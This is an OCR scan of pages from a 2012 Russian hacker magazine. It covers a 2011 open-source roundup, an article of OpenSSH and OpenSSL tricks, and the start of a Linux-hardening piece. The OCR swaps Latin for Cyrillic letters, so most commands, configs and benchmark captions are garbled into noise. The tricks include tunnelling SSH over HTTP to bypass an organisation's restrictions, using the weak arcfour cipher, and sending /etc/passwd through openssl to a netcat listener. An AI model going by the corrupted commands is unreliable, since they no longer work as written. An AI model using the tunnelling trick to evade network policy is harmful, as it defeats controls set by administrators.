сией 3 (предназначена только для планшетов) 
и версией 4 (объединенная, для планшетов 
и телефонов). 

Исходные коды ОС были полностью открыты 
только ближе к концу года, после выхода чет- 
вертой версии. Основные нововведения: 

• Обновленный интерфейс — новая панель 
уведомлений, новые шрифты. 

• Встроенное приложение для контроля тра- 
фика, позволяющее заблокировать доступ 
в сеть для определенного приложения. 

• Функция Расе ІІпІоскдля разблокирования 
экрана с помощью своего лица. 

• Стандартный диспетчерзадач, который 
умеет завершать приложения. 

• Стандартныесредства для создания скрин- 
шотовэкрана. 

• Оптимизации браузера с введением новых 
фишек (возможность изменить ІІзегАдепІ, 
синхронизация закладок с ОоодІе СИ готе). 



5(аІСоип(ег ѲІоЬаІ 5(а(5 

5 лучших браузеров с января по ноябрь 2011 



Ф ЕІ 

• Ріге^ох 

• СМготе 

• За^агі 

• Орега 
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Победы и поражения ореп зоигсе — 2011 




Не успел ІМокіа N9, первый и последний 
смартфон под управлением многострадального 
МееЗо, появиться на рынке, как было принято 
решение заменить МееЗо новой платформой 
Тігеп, которая отличается широким использо- 
ванием НТМІ.5 при разработке приложений. 
Подробностей пока немного (хотя первые 
тестовые версии должны выйти в первом 
квартале 2012-го), известно только, что раз- 
работкой платформы будут заниматься 1_іпііх 
Роипсіаііоп и І_іМо Роипсіаііоп. Однако сообще- 
ство отнеслось к новому проекту скептически 
— его настроение можно охарактеризовать 
фразой «давайте уже хоть что-нибудь доведем 
до конца». 



БРАУЗЕРЫ 



За прошедший год все популярные опен- 

сорсные браузеры шагнули далеко вперед. 

Самый большой сбапдеіод в прошлом году был 

у РігеРох 4: 

• Интерфейс приобрел черты Зоодіе СЬготе: 
панель в кладок переехала в самый верх 

и теперь находится над адресной строкой. 
Также переработан интерфейс менеджера 
дополнений (которыйтеперьоткрывается во 
вкладке, а не в отдельном окне). 

• Появился инструментѴѴеЬ Сопзоіе (ѴѴеЬ 
Іпзресіог) — своего рода облегченный вари- 
антРігеЬид. 

• Добавлена поддержка ѴѴеЬМ и кодека ѴР8 
втеге<ѵісІео>. 

• Синхронизациязакладок, истории, паролей 
между несколькими ком па ми теперь осу- 
ществляется через сервера МогіІІа и доступ- 
на «из коробки» (раньше она реализовыва- 
лась с помощью дополнения Рігеіюх 5упс). 

• Добавлена поддержка ѴѴеЬЗІ. (технология, 
с помощью которой можно получитьдоступ 
к функциям 0 реп ЗЬ из ЗаѵаЗсгірі). 

• Добавлена поддержка спецификации 
АРІ ЫехесЮВ, которая позволяетчерез 
ЗаѵаЗсгірІ делать выборки с сортировкой 
из интегрированной сѵѵеЬ-браузером базы 
данных. 

• Добавлена поддержка протокола ѴѴеЬ 
Зоскеіздля организации двусторонней 
связи междубраузером и ѵѵеЬ-сервером. 

• Появиласьстраница аЬоиІ:тетогу, отобра- 
жающая подробную информацию о том, как 
браузер используетОЗУ. 

• В основном благодаря новому ЗаѵаБсгірІ- 



движку удал ось добиться серьезного уско- 
рения. 

• Добавлен новый НТТР-за головок йо І\ІоІ 
Тгаск, после получения которого сайтдол- 
жен прекратить слежку за пользователем. :) 

• Плагинытеперьвыполняются вотдельных 
процессах, чтобы падающий РІазЬ-плагин 
не ронял весь браузер. 

Начиная с пятерки, новые версии выходили 
часто, а серьезных изменений в них было 
немного, поэтому сразу перечислю все новые 
фичи в релизах 5-9: 

• Исправлены проблемы сутечками памяти. 

• На странице аЬоиІ:регтІ55Іоп5 можно 
настроить права на сохранение паролей, 
использование кук и некоторых НТМІ.5- 
технологий отдельно для каждого домена. 

• Добавлена поддержка НТМІ_5-тегов 
ргодгезз и сопіехітепи. 

• Для функционирования дополнен ий, уста - 
на вливающихся автоматически (например, 
при установке Зкуре или Заѵа), теперь требу- 
ется явное разрешение от пользователя. 

Зоодіе СЬготе, основной конкурент Рігеіюх 
за звание второго по популярности браузера, 
в прошедшем году зарелизился семь раз (были 
выпущены версии с 9 по 15). 



Основные фичи, которыми браузер обза- 
велся за год: 

• ѴѴеЬЗІ. включен поумолчанию. 

• Ускорение за счет обновления ЗаѵаБсгірІ- 
движка. 

• Ускорение воспроизведения видео, осу- 
ществляемое средствами видеокарты. 

• Настройки браузера переехали изотдель- 
ныхокон во вкладки. 

• Механизма голосового заполнения форм 
(голос распознается на серверах Зоодіе). 

• Возможностьочищать РІазЬ Соокіе. 

• Возможность сохранять страницу в РйР. 

• Поддержка АРІ ІпбехесЮВ. 

• Технология ІМаІіѵе СІіепІ, позволяющая 
выполнять код на С/С++ через браузер прак- 
тически без потери производительности 

по сравнению с системными приложениями. 

По данным ЗіаіСоипІег, в конце прошлого 
года Зоодіе СЬготе стал вторым по популяр- 
ности браузером в мире (после вечного ІЕ), 
обогнав Рігеіюх. 



ТО ВЕ СОМТІЫІІЕО 



Немного проанализировав направление раз- 
вития опенсорсных проектов в прошлом году, 
можно предположить, что нас ждет в этом. 
Продолжается бум мобильных устройств, поэ- 
тому в низкоуровневых компонентах (типа ядра 
или ЗСС) будет улучшаться поддержка АРМ, 
а высокоуровневые обзаведутся интерфейсом, 
оптимизированным для тачскринов. Вігію 
окончательно стабилизируется и будет исполь- 
зоваться во многих дистрибутивах (возможно, 
даже как Р5 по умолчанию). РІазЬ, наконец, 
умрет (это уже, правда, мои мечты). Также 
ожидается появление большого количества 
опенсорсных игр для І_іпих на движке Ооот 3 
и нескольких проприетарных игр на кросс- 
платформенных движках. А еще, говорят, 
выйдет ЗІМР 2.8. Ну и напоследок, пока я 
за Нострадамуса, скажу только тебе и по боль- 
шому секрету: конца света не будет :). □С 




ІІЬипІи БоЙѵѵаге Сепіег 
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ІЖІХОІО 



Евгений Зобнин (ехесЬіІ.ги) 




Криптологический 

ХАРДКОРНЫЕ ВОЗМОЖНОСТИ 0РЕЫ55І. 
УСІ VI и 0РЕЫ55Н, О КОТОРЫХ ТЫ НЕ ЗНАЛ 



Такие инструменты, как ОрепЗБН и 0реп55І_, 
в представлении не нуждаются. Это вечные 
друзья любого сисадмина и многих продвинутых 
пользователей. Однако далеко не все знают 
об их истинной мощи и возможностях, 
накопленных за годы разработки. Сегодня 
тебе откроется масса интересных способов 
использования этих программ. 



0РЕЫ55Н 



0реп55Н, пришедший на смену дырявому Теіпеі, до сих пор за- 
нимает первое место среди систем удаленного управления бла- 
годаря безопасности и простоте в использовании. Разобраться 
в нем способны все, даже самые хромированные чайники, одна- 
ко подавляющее большинство пользователей задействует мини- 
мум его возможностей. Опустим рассказы о ключах, пробросах 
портов, проксировании и других полезных, но всем известных 



> ЭДЁПізІ а еІіепЕ якйгніі злЕр егН -елплмі 5-т.Е.а , 5 * 41 1 .со^.25 

гамьЕсщнвммвдэ* 

ОДЕГГІ С г цй, О бСкіцІг ІЛС, СМ йчлэіііе ІіПгтітеЕ АііЕПйГІІу 
ѵСГкТЦ В*ТЗГ:ПаАі2в:*Гі&Ые Е'Э І.СЛйІ ІЗІивГ НГІІТІСаІЕ 

ѵг* іГу геЕіГП-в 

Си- ЕіТ ІсвЕе сКаап- 

в 3;/С=Ш/&Т:Сй1 іТ^Ыа/иГЦЛЛЕіій [Пі/СН=*ФЕ|і 

І :/СмН/а»Бв&д Ів ІіЧі-'СіЧ-БзедІ-е Гпіе^пеЕ ЙиЕЛйГіІу 
3 ^/МБ/О-Стчіе ГпеД1М-ВжчЗ« ІпІйгпвЕ НігЕЬсгіІу 
|:/СтіН/0-ЕЧиІР^/0іЕ-€^ІТйч СггШ ЬСйІ* Нц|1нгЦу 

Зг-ѵег сегііТ :-са : І.е 

— — еСѲГМ СОТЗПСЙ17— 

ИЗ I ЙеССЯѣБдЯи I КІд I * яМитаИЙЧ аг і С.ЧиагаО'_ТЧППМіь^йТГО 

ѵооошш тгашптаамгн з і е іѵча жъѵяпнѵі?* 1 1 е і и 

дЫ/уйиУЙ I ЕПл&іѵсн I ЙгТПИ 7 ЛчПТЙ^П ѵ лСетгСі I йГЛшгцЯ^НІ ЧіЛІАяЪ I л 
НЦнСіАЛДОНѴТЙ 1 ѴІНІАМігЕЧМ ЗефВ№ргпЭ^ІМ№Й1Г№ВДнЕи ш 

. і-сііѵнК'. г* '.ЪІС&ізДнЛдкфік - 1 еЯыОЕЙОг Г ЯКШ^і^Ч ЬСд *ЖЙг-.ЯЬлс а - «Тс 3 .., 

ПкЪпГа сгёѵ I щ ІЙЙкг^ЙРОГ/г Нмі ;мт\ГЙ0*МК5-.іи а ЗНАВДВДиІ 

34 ІЙГЫЙТР *2 1 ЕЕ ЗъГ вГ арІіЗ _ТСЯі* ЙЗаПСЯІ^дГь-еййЯ ]'ЛЙдЗн0ЕІіС 
? Е МпвдвдчвХцуш* і нк л /мСРг^и > і УиДа4 П/і>-<з 

іЯнГІІІ ГЧІЛІІІ- ЙйНГѴіѴИ м йя « 
Ь№213 I ^ЁМуапѴЮХ^еяБддаУЯ&.Й- . Ей I и^у&пММЧѴ0аеЭуя*ЦЗй.пйу 
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Шифруем файлы с помощью ОрепББІ. 



приемах и рассмотрим на самом деле интересные и не слишком 
распространенные способы использования этого инструмента. 

Итак, трюк номер один — множественные подключения. 
0реп55Н способен обслуживать множество одновременных 
соединений с одной и той же машиной. Обычно пользователи 
просто запускают команду и ждут ее завершения, чтобы за- 
пустить следующую. К счастью, эту проблему легко обойти путем 
разделения одного соединения на множество сессий. Просто 
добавь в конфиг ззЬ (-/.ззЬ/сопПд) следующие строки: 

СопІігоІМазІіег аиііо 
СопІігоІРаІіЬ ~/ . зз!і/тих_%Іі_%р_%г 

Ты сможешь создать столько соединений с одним и тем же сер- 
вером, сколько посчитаешь нужным, причем время на повторную 
аутентификацию тратить будет не нужно. 

Трюк номер два — проксирование соединений. Допустим, 
ты не можешь создать соединение с 55Н-сервером напрямую, 
но можешь использовать для этого другой хост, к которому ты 
тоже имеешь 55Н-доступ. Добавь в свой конфиг следующие 
строки: 

Ропл/агсІА§еп1: уез 
Нозі: Ііозі: 

Ноз1:ІМате Ііозі:. сот 
РгохѵСоттапсІ ззіі ргоху- Ііозі:. сот \ 
пеіісаі: -ц 600 %р 

Команда ззИ Ііозі создаст соединение с сервером Ііозі. сот 
через сервер ргоху-ііозі.сот. 

Трюк номер три — выход за пределы НТТР-изоляции. Многие 
организации не просто режут неугодный им трафик, но и принуж- 
дают пользователей выходить в Сеть только с использованием 
НТТР- протокол а. Такую несправедливость легко обойти с помощью 
согкзсгеѵѵ ( ѵѵѵѵѵѵ.адготап.пеі/согкзсгеѵѵ/ ). который умеет туннели- 
ровать 55Н-трафик через НТТР. Просто установи его на свою маши- 
ну и добавь в конфиг следующие строки (где ргоху.сот и 80 — это 
адрес внешнего НТТР-прокси и его порт): 



Нозі: * 

РгохуСоттапсІ согкзсгем ргоху.сот 80 %Іі %р 

Теперь все соединения пойдут через указанный НТТР-прокси. 
Трюк номер четыре — тест пропускной способности сети. Чтобы 
протестировать скорость соединения, необязательно устанавли- 
вать специализированное ПО, достаточно утилиты рѵ и старого 
доброго 55Н: 

$ зисіо ар1:-§е1: іпзТаІІ рѵ 
$ уез | рѵ | ззИ Иозіі.сот "саі: > /сІеѵ/пиП" 

Трюк номер пять — удаленный анализ сетевого трафика. Почти 
в любой ІІІЧІХ-системе есть сетевой сниффер Ісрбитр, однако 
читать его логи довольно утомительно. Возможности 0реп55Н по- 
могут упростить анализ трафика: 

$ ззіі гооШіоз1:.сот Іісрсіитр -ѵі - ' рогЕ ! 22 ' \ 

| ы ігезііагк -к -і - 

Теперь весь трафик, проходящий через Ііозі. сот, будет виден 
в графическом окне ѵѵігезЬагк на твоей машине. 

Трюк номер шесть — передача файлов на низкой скорости. 
Иногда бывает необходимо передать большое количество файлов 
на удаленную машину, но сделать это так, чтобы процесс не мешал 
работе с сетью. В этом случае можно воспользоваться инструмен- 
том сзігеат: 

$ зисіо ар-Е-§е1: іпзТаІІ сзТгеат 
$ *аг -сд /Ьаскир | сзіігеат -1: 512к | \ 
ззіі Ііозі: Чаг -хд -С /Ьаскир' 

Трюк номер семь — всегда открытая 55Н -сессия. Пользовате- 
лям ноутбуков, чье соединение с сетью может быть не постоянным, 
приходится каждый раз заново запускать 55Н-клиент в момент, 
когда сеть появляется, и убивать его при потере соединения. 
Избежать этого можно с помощью инструмента аиіоззіі, который 
будет поддерживать иллюзию постоянного соединения с сервером, 
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> орепй^І з.ііте -согпесі дімІІ.сст:44Э -шілг /іе'Э'Ь .Ііігпі -пей 

Нп СІРНЕР зресШегі 

СоМесІіпд соппесТіоп зІаПзІісз Іог ЭЙ зесопйз 

шішишішііштишишішшштшштшшіишштишишншти 

94 с о п пес и опз і п Ѳ . 72з : 139.56 с оте с 1і оп з /изег з е с , Ьу 1 ез геай Э672 Ѳ 
94 еоппееііопз 1п 31 геаі зесопйз, 412 Буіез геай рег сстпесіійг» 

> орепзві Б_итв -соппесі дтаі 1 .сот: 443 -іллі /іеэі.йіпіі -пеш -ззІЭ -сірЬег НІСН 
СоПесипд соппесиоп его и ей се іог эй зег_апсі5 

Э Э ЭЗЭЭ Э ЗЗЭ Э ЭЗЗЭ Э 333 Э ЭЗЗЭ Э ЗЗЭ Э ЭЗЗЭ Э 333 3 ЭЗЗЭ Э ЭЗЗ 3 Э 333 Э 333 Э Э 333 Э ЭЗЭ Э Э ЗЗЭ Э ЭЗЗЭ Э 333 Э ЭЗЭ Э Э 333 э эзэз э 

93 ссппесііопг іг Ѳ.63&; 13Б.76 соппесііопз/изег Бес, Ьуіез геасі Э831Б 
93 соппѳсПопе іп 31 геаі зесопйе, 412 Ьуіѳэ геаО рѳг солпесиоп 

> I 



Делаем бенчмарк 551-сервера бтаіі 



восстанавливая связь, когда сеть окажется доступной: 

$ 5іісіо аріі-^еі: іпзііаіі эііііоббіі 
$ аиТоББІі -М50000 -1: зегѵег. ехатріе. сот \ 

'зсгееп -паАсІ тузеББІоп' 

Трюк номер восемь — запуск команды на нескольких серверах 
одновременно. Комментарии излишни: 

$ есііо "ирТіте" | рее "ббіі ЬозТІ" "ббіі ііоб1:2 " \ 

"ббіі ііоб1:3" 



Трюк номер девять — удаленное сравнение файлов. Часто 
требуется сравнить локальную и удаленную версию какого-либо 
конфига, однако копировать файлы туда-сюда неудобно и долго. 

В этом случае можно воспользоваться следующей командой: 

$ б б М и5еп@Іі05І: саі: /путь/к/удаленному/файлу _| \ 
сІі-РТ /путь/к/локальному/файлу - 

То же самое можно проделать для двух файлов, находящихся 
на разных серверах: 

$ сІіТТ < ( ббіі ііобііі саі: /е1=с/ар1:/5оигсе5 . іібі: ^ \ 

< ( б б И Ріоб 1=2 саі: / е1=с/ар1:/5оигсе5 Лібі:^ 

Трюк номер 10 — одновременный просмотр логов с нескольких 
машин. С помощью тиІШаіІ и 55Н можно запросто просматривать 
логи с двух серверов одновременно: 



СР110: РІМ6АЕ5 



Результаты бенчмарка криптографических средств, 
встроенных в СР11 платформы ѴІА Есіеп (процессорные 
инструкции для работы с алгоритмом блочного симметричного 
шифрования АЕ5): 

% орепББІ зреесі -еіарзесі -еѵр аеБ-256-сЬс 

Іуре 16 ЬуЕез 64 ЬуЕез 256 Ьуііез 1024 Ьуііев 8192 ЬуЕез 

аез-256-сЬс 21780. ЗЗк 79591. 78к 198578. 08к 317102. 05к 383371. 05к 



$ зисіо ар1:-§е1: іпзТаІІ ти11:і1аі1 
$ тиИ:і1:аі1 -1 'ббіі Иобііі 'Чаіі -Т \ 

/ѵаг/1о§/арасІіе2/еггог . 1о§" ' -1 'ббіі Ьоб1:2 \ 

"Ііаіі -Т /ѵаг/1о§/арасІіе2/еггоп. 1о§" ' 

Трюк номер 11 — копирование файлов с одной удаленной 
машины на другую через локальную. В случае если две удаленные 
машины не могут установить связь друг с другом, файлы между 
ними можно передавать, используя свой комп в качестве промежу- 
точного звена: 

$ б б И гоо1:@Ііо5І:1 "ссі ^/каталог && 1:аг -сТ - . " |\ 
ббН гооЪШюзЫ "ссі /каталог && Ііаг -хТ 

Трюк номер 12 — копирование вывода удаленной команды 
в буфер обмена. Часто требуется скопировать вывод удаленной 
команды в буфер обмена, чтобы вставить его в письмо, сообще- 
ние форума и т. д. Проще всего это сделать с помощью утилиты 
хсіір: 

$ ббіі изегфІіоБІ: саі: /файл.ЪсЕ | хсіір 

Трюк номер 13 — синхронизация времени средствами 55Н. 

В случае, если машина не имеет доступа к ІЧТР-серверу или на ней 
не установлен ІЧТР-клиент, синхронизировать время между маши- 
нами можно так: 

# сіаііе --5е1:="$(55Іі и5ег@5егѵег сІа^еѴ 

Трюк номер 14 — установка пакетов удаленной машины 
на локальную. Нередко требуется синхронизировать две машины 
так, чтобы они имели одинаковый набор установленных пакетов. 
Стандартными методами сделать это сложно, но с помощью 55Н 
проще простого: 

# ббіі гетоІіеІіоБІ: 'сІрк§ - -§е1:-5е1ес1:іоп5 ' | \ 

сІрк§ --5е1:-5е1ес1:іоп5 && сізеіесі: іпзТаІІ 

Трюк номер 15 — снимок удаленного экрана. Можно очень легко 
получить изображение Х-сервера с удаленной машины, воспользо- 
вавшись стандартным графическим пакетом ІтадеМадіск: 

# ббіі и5ег@Іі05І: "ОІ5РІ_АѴ=:0.0 ітрогі: -міпсіом \ 

гооТ -Тогтаі: рп§ | сіізріау -Тогтаі: рп§ - 

Чтобы сохранить его в файле, последнюю команду следует за- 
менить на «> ^ііе.рпд». 
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Трюк номер 16 — ускорение передачи данных. Если машины, 
с которыми установлено соединение, находятся внутри заведомо 
безопасной сети (например, офис или дом], передачу данных сред- 
ствами 55Н можно несколько ускорить, если использовать менее 
стойкий алгоритм шифрования. Для этого добавь в конфигураци- 
онный файл следующие строки: 

Нобіі Ьобіі . сот 

СірІіегБ агсТоиг256 
МАСб итас-64@ореп55Іі. сот 

Трюк номер 17 — вывод звука с удаленной машины на локаль- 
ную. Вместе с картинкой рабочего стола удаленной машины иногда 
хочется получить и звук. Это делается с помощью банального сИ: 

$ сИ і-Р=/с1еѵ/сІ5р | б б И -с апс-Роип -С \ 
ивепіЭІіоБІ: сісі оТ=/сІеѵ/сІ5р 

Трюк номер 18 — запуск локального скрипта на удаленной ма- 
шине. Нередко требуется запустить скрипт на удаленной машине, 
однако копировать его туда совсем необязательно, достаточно 
выполнить следующую простую команду: 

$ б б М -Т изег^ІіоБІ: < зспірІі.БІт 



0РЕЫ55І_ 



0реп55І_ представляет собой систему защиты и сертификации 
данных, которая была разработана в ответ на создание протокола 
безопасных сокетов 55І_ компанией ІЧеІзсаре. Вопреки расхожему 
мнению, 0реп55І_ вовсе не является инструментом для реализации 
551-протокола и может выполнять множество самых разнообраз- 
ных функций, в том числе управлять ключами и сертификатами, 
рассчитывать хеши и т. д. Вот лишь неполный список возможно- 
стей этого криптографического комбайна: 

• создание ключей Р5Аи 05А и управление ими (команды гза, сіза, 
сізарагат); 

• создание сертификатов формата х509, формирование запросов 
на сертификацию, восстановление (команды х509, гец, ѵегіі'у, са, 
сгі, ркзі 2, ркз7); 

• симметричное и асимметричное шифрование данных (команды 
епс, гзаіііі); 

• расчетхешей (команда сідзі); 

• работа с 5/М I М Е (команда з/тіте). 

Также 0реп55І_ может быть использован для проверки 551- 
серверов и клиентов с помощью специальных команд 5_сІіепі/5_ 
зегѵег и для тестирования скорости работы различных алгоритмов 
(команда зреесі). 

Мы не раз писали о работе с пакетом 0реп55І_, поэтому не будем 
рассматривать стандартные примеры его использования вроде 
создания хешей и сертификатов, а сразу перейдем к более серьез- 
ным трюкам. 



ВРЕМЯ — ДЕНЬГИ 



Одна из интересных особенностей 0реп55І_ заключается в том, что 
он может провести бенчмарк используемых алгоритмов и скорости 



установления 551-соединения. Для этого предназначена стан- 
дартная команда 5_1іте. Чтобы оценить скорость установки 551- 
соединения, нужно применить ее к команде орепззі: 

$ орепззі з_1:іте -соппесі: §таі1 . сот:443 \ 

-мл/м /ІіеБІ: . ІтЬтІ -пем 

103 соппесІііопБ іп 0.75б; 137.33 соппесііопБ/ііБеп вес, 

ЬуІіеБ пеасі 42436 

103 соппесІііопБ іп 31 геа! весопсІБ. 412 ЬуЕев пеасі реп 
соппесііоп 

То же самое можно проделать с помощью наиболее стойких 
алгоритмов: 

$ орепзБІ б Іііте -ббіЗ -сірііеп НІ6Н \ 

-соппесі: %таі1.сот:443 -ммм / -пем 
99 соппесІііопБ іп Ѳ.73 б; 135.62 соппесІііопБ/иБеп вес. 
ЬуТев пеасі 40788 

99 соппесІііопБ іп 31 ге аі весопсІБ^ 412 Ьуіев пеасі реп 
соппесііоп 



Эти две команды позволяют определить максимальную про- 
пускную способность 551-сервера. Но еще более интересный 
способ заключается в тестировании всех поддерживаемых алго- 
ритмов. Для этого нам придется прибегнуть к скриптингу: 

ІР5=" : " 

-Роп с іп $(ореп55І сірИепБ -ббіЗ К5АУ. сіо 
есііо $с 

орепзБІ 5_1:іте -соппесі: бо5І::443 -ммм /__-пем^\ 

-Іііте 10 -сірбеп $с 2>&1 | §пер ЬуІіеБ 

есбо 

сіопе 

Такая команда позволяет измерить скорость установки 551- 
соединения с помощью различных алгоритмов шифрования, что 
можно использовать, например, для тюнинга 551-сервера. Если же 
55І_-сервера как такового еще нет, его легко эмулировать с помо- 
щью самого 0реп55І_. На серверной машине запускаем 0реп551_- 
сервер: 

$ орепББІ Бвепѵеп -сегЕ тѵсепіі.рет -ммм 

На клиентской выполняем следующую команду: 

$ орепББІ б Іііте -соппесі туНо51::4433 \ 

-ммм / -пем -б біЗ 



КЛИЕНТСКАЯ СТОРОНА 



Еще одна интересная команда 0реп55І_ — это з сііепі, кото- 
рая позволяет коннектиться к удаленным 551-серверам для 
их тестирования. Чаще всего я использую эту команду, чтобы 
проверить дату выдачи сертификата. Для этого следует про- 
сто подключиться к удаленному 55І_-серверу, дождаться, пока 
на экране появится информация о сертификате, а затем про- 



5 ееГіо I ореп55 1 з^сИепІ -срплесі ыіііщ_дсіод1е_есіт:443 3>А!еи/пдН Іореп^І и500 -сіаіеа -Ір^иег -з 
иі^есі -пооій 

по1:ВЕ?оге=0с1; 26 00:00:00 2011 6НТ 
поШГ1ег=5ер 30 33:59:53 2013 БИТ 

імиег= /С^ЗН/О^ТТіаыІ е СопеіЛ ііпд (Р1у) ий. /С^ТКашІе 5ЙС СН 

би^ес!= /С=и5/5Т=СаШогпіа/1=Ноигі1аіп Ѵіеш'ОИЗоодІе Іпс/СН-шліі.доодІе.соііі 

> I 



Вычленяем нужную информацию из сертификата х509 
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ІЖІХОГО 



Евгений Зобнин (ехесЫТш] 



уеб [ рѵ I 55^ гоЬпіпѲехесЬіІ . ги "саі > /сІеѵ/пиП" 
|2,ВПВ 0:00:07 [ ІЗІкВ/е] [ <=> 



Тестируем скорость соединения с помощью 55Н и рѵ 



гнать его через всё тот же орепааі, чтобы вычленить даты. При 
использовании одной команды всё это выглядиттак: 

$ есбо |_орепаа1 а_с1іепТ -соппесТ X 

ыыы.§оо§1е.сот:443 2>/сІеѵ/пи11 [ \ 
орепааі х509 -сІаТеа -пооиТ 
по1:Ве-Роге=Ос1: 26 00:00:00 2011 6МТ 
поТАТТе^Бер 30 23:59:59 2013 6МТ 

Команду з_сІ іепі можно также применять для тестирования сер- 
вера на уязвимость, заключающуюся в использовании нестойких 
алгоритмов шифрования: 

$ орепззі асІіепТ -соппесТ №лм.§оо%1е.сот:443 \ 

-сірііег ЮМ 
СОІ\ІІ\ІЕСТЕО(00000003) 

140513251690152 : еггоп : 14077410 : 55І_ гоиТіпеа : 55І_23_ 
6ЕТ5ЕКѴЕКНЕІ.І.0: ааІѵЗ аІегТ бапсіабаке -Раііиге : з23_ 
сІпТ.с :658: 



Сервер, не поддерживающий нестойкие алгоритмы шифро- 
вания, просто откажется устанавливать соединение, как это 
и произошло в случае с сервером Соодіе. Команда а_сІіепІ также 
довольно удобна для отладки различных протоколов (в этом 
случае она выступает в виде 55І_'ного Теіпеі). Например: 

$ орепззі з сііепі: -аТагТТІа атТр -сгі-р \ 

-соппесі зш1:р.^таі1.сот:25 



ШИФРОВАНИЕ 



О шифровании с помощью 0реп55І_ не писал только ленивый, 
поэтому мы остановимся не на самих принципах шифрования, 
а на том, как его можно использовать для вспомогательных 
задач. Утилита командной строки орепззі удобна тем, что она, 
как и все остальные команды ЬІ N IX, может принимать данные 
на вход и имеет для них стандартный выход. В результате с по- 



? орел5*1 зееесі 

Ойілд вд*2 Тог За сп 13- $І» Ыдск*: 275891 шК'ѣ іп 2. 99* 

О&Шд ІМІ7 тог э* СП 64 віів И0724 НЙ2Ч іп 3.80* 

Оошд п*12 Тог За им 258 аіій Ыосіа : 47893 т Й . 97* 

Ооіпд м*2 Тог За оп 1924 ЯІ2ё Ыаскэ. 12348 тЯЧ 1п 2.В8ь 

ооіпд іьзг тог э? оп тз2 аім москз: 1Б7? ввгЧ іп 2.895 

йкнпд гегііі Таг Зи ап 1 ё ві?е. й Іосія: І4ШЙ4В тйс2‘я ]п 5.99и 
[іо ілд и*с2 Таг За- оп Ь4 з-іге Ыоска: 337128 тйс2‘‘а кп З.ѲѲа 
Оаілд і№2 Тог За оп 256 вім Ыосіез: 101916 Іп 2.995 

Ивіпд I і№ 2 ТПГ 3-5 ВП 1И2Д эіге Іп 2-895 

[іа тд тей:2 Тпг За пп 8132 віге йЗсска : 3277 тйс2 ! 5 Іп 3.83а 
Ооілд гиМ Тог 35 оп 16 зіа* Ымк-і: 8699641 гтіеГз Іп 2.99 у 

бпіпд гггі4 Тог Эв он 64 5І« Ыккѵ 6665195 гміЯ'ъ Іп 2.995 

йашд ггС-І Тог За он 256 вігв П Іосія: 40^2607 гтШ-1 ’ а іп 2.93а 
Оаіпц гтс9 Тог За оп 1824 азхо Ыискь; 1554ЕВ8 іп 2.99а 

Ооіпд пй4 Тог Эв оп 6192 5іго Ыоскз: 232653 гчМ’д щ 2.995 
Патд гтлБ Тог 9а он 15 зІ7Е ЬЗаска; 620ЭЙ1Б гпгіБ'и Іп 2.9Ё5 

Осппд гйЬ Тог За ш Ь-' а і іге ЬЗоска: 4ВБ3342 пкіБ'а Іп 3.005 

Ооіпд гтсі Тог Эй оп 255 аЬге ЫосЛз; 2&1І&Э6 г*к|5Ч іп 2,99й 

СЫп0 КБ Тог 35 СП 1874 ьію Ыоскр: ШШ5 иБЧ Іп 2 № 
Опіпд грй 5 Тог За оп В1Э2 ьзге Ыпска: 152857 гтніБ'а Іп 2.93а 
Ооіпд Ьмсіагі&і Тог За оп 16 аіаі Ы«ка; | 

Тестируем скорость алгоритмов с помощью команды зреесі 



мощью одной простой команды можно обеспечить, например, 



защищенную передачу файла по сети: 




отправляющий$ саТ /еТс/рааамсІ | орепааі \ 




аеа-256-сЬс -а -е -оааа оааа:паооль 1 


\ 


пеТсаТ -1 -р 8080 


поинимающийі пеТсаТ хост: 8080 1 ооепааі \ 


аеа-256-сЬс -а -сі -рааа рааа:пароль > 


раааысі 



Можно также применять и различные скрипты, чтобы автомати- 
зировать шифрование множества файлов (пароль в Атр/раззѵѵсІ): 

$ -Рог іЛп * і сіо [ --Р $і ] && \ 

орепааі епс -ае5-25б-сЬс -ааіі: -іп $-р \ 

-оиі: $-Р.епс -рааз біе: /1:тр/ра5 5іл/сІ ; сіопе 

Для расшифровки отдельно взятых файлов используем следую- 
щую команду: 

$ орепзБІ епс -сі -аеа-256-сЬс -заіі: \ 

-іп файл. епс -оиі: біепате \ 

-раза РіІеі/раТІі/То/рааамсІ 

Для шифрования целого каталога проще, конечно, воспользо- 
ваться такой конструкцией: 

$ 1:аг с каталог | орепаа! епс -ае5-25б-сЬс -е \ 

> аесгеіі.ііаг.епс 

ОрепЗЗЬ удобно использовать для генерирования паролей: 

$ орепааі гапсі 8 -Ьаае64 
О0НяТѵ910аУ= 

А сгенерировать хеш для записи в /еіс/раааѵѵсі можно так: 

# орепааі раааысі -1 ту-аесгеТ-рааа 
$1$ЫА7АѴІіО[$ѵ9Ѵа6ыаеіКК[56о3^21ТР0 

Кстати, кодирование в Ьаае64 может пригодиться для отправки 
файлов, если двоичная передача данных не поддерживается: 

$ Таг -с каталог | §іір -9 | орепааі епс \ 

-Ьаае64 > Тех1:-теааа§е.1:х1: 

Возможность генерирования случайных данных можно исполь- 
зовать для создания фиктивных МАС-адресов: 

$ орепааі гапсі -бех 6 | Л 

аесі , а/\(.Л)/\1:/е; в/ А //' 

-Р2 : 9е : 56 : -РсІ : 5а : 93 



выводы 



Когда речь заходит о таких развитых, проверенных временем 
и широко применяемых инструментах, как 0реп55І_ и 0реп55Н, 
юниксоиды незамедлительно начинают приводить десятки приме- 
ров их использования в повседневной жизни. Иногда эти примеры 
кажутся простыми и обыденными, но иногда просто поражаешься 
находчивости разработчиков и пользователей этих программ. ПЕ 



114 



ХАКЕР 02/157/2012 







РЕКЛАМА 




♦ 




ОТБОРНЫЕ ПРОДУКТЫ 

СО ВСЕГО МИРА* 



Ш Мы зноем, где с мире пойти самые лучшие продукты. 

Вы знаете, что можете но йпінк родом» гкрдм^ксчіТАЗН 






5УЫ/АСК 



Евгений Зобнин (ехесЬіІі.ги) 




ечебное 



оорезание 

Л С ПАСМ 









ДЕЛАЕМ 

МИНИМАЛИСТИЧНЫЙ 

иыцх-дистриБУТив 

ДЛЯ КОНКРЕТНОГО 
СЕРВЕРА 




Безопасность и надежность 
программной системы 
обратно пропорциональны ее 
сложности. Но к современным 
Ыпих-дистрибутивам эту 
формулу применить довольно 
проблематично, так как, по 
общепринятому мнению, они 
безопасны сами по себе. К 
сожалению, это не так, но в этой 
статье я расскажу и покажу, как 
сделать Ыпих действительно 
простой и очень устойчивой к 
взломам системой. 



ГТШ 

Хорошей практикой 
будет установка 
утилиты гкЬипІег, 
которая сверяет 
контрольные 
суммы системы, 
чтобы выявить 
факт модификации 
файлов. 

Чтобы запутать 
взломщика, можно 
удалить команды 
ипате и сітезд, 
переименовать 
ядро и внести 
соответствующие 
